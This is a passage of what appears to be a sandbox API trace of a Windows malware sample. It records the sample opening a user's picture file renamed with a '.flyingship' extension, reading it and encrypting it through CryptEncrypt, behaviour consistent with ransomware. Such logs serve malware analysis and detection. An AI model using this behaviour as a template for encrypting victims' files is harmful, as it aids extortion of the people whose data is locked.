HM8KLbxN.flyingship.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\3tvbet hm8klbxn.flyingship.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0188.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0188.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0188.770] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0188.771] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.771] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0188.771] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0188.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.771] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0188.771] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0188.771] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0188.775] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x13c3, lpOverlapped=0x0) returned 1 [0188.775] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0188.777] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0188.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0188.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0188.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0188.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0188.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x113c3) returned 0xbea018 [0188.784] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0188.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0188.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.785] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0188.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.785] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0188.786] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0188.786] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0188.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0188.786] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0188.787] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0188.787] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0188.787] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0188.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0188.788] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0188.788] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.788] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0188.788] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0188.788] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2748, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2748*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0188.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0188.789] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0188.789] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0188.789] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0188.789] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0188.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0188.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0188.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0188.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0188.790] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0188.790] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.790] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.790] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.790] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.790] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.790] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.790] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.790] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.790] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.791] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.791] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.791] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.791] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x113c3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x113d0) returned 1 [0188.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0188.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.792] CharLowerBuffW (in: lpsz="byte[70609]", cchLength=0xb | out: lpsz="byte[70609]") returned 0xb [0188.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.792] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.792] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.793] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa703d8*, pdwDataLen=0x87e820*=0x113c3, dwBufLen=0x113d0 | out: pbData=0xa703d8*, pdwDataLen=0x87e820*=0x113d0) returned 1 [0188.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0188.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.794] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.794] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.794] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.794] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0188.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.794] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.794] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.794] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.794] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.794] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.794] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.794] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.794] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0188.795] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0188.795] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.800] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.800] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0188.800] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.805] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.805] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.805] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0188.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.805] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 